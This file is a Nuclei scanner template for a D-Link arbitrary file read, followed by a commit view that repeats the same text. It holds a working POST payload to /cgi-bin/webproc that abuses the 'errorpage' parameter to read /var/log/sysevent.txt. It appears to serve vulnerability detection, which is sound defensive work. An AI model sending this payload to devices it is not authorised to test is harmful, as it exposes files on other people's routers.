nuclei-templates/misconfiguration/d-link-arbitary-fileread.yaml

id: dlink-file-read

info:
  name: D-Link Arbitrary File Read
  author: dhiyaneshDK
  severity: high
  reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html

requests:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/webproc"
    body: 'getpage=html%2Findex.html&errorpage=/var/log/sysevent.txt&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=test&%3Aaction=login&%3Asessionid=365dfaef'
    matchers:
      - type: word
        words:
          - "Manufacturer: D-Link"
        condition: and
        part: body
Create d-link-arbitary-fileread.yaml 2021-03-02 14:09:19 +00:00			`id: dlink-file-read`

			`info:`
			`name: D-Link Arbitrary File Read`
			`author: dhiyaneshDK`
			`severity: high`
			`reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html`

			`requests:`
			`- method: POST`
			`path:`
			`- "{{BaseURL}}/cgi-bin/webproc"`
			`body: 'getpage=html%2Findex.html&errorpage=/var/log/sysevent.txt&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=test&%3Aaction=login&%3Asessionid=365dfaef'`
			`matchers:`
			`- type: word`
			`words:`
			`- "Manufacturer: D-Link"`
			`condition: and`
			`part: body`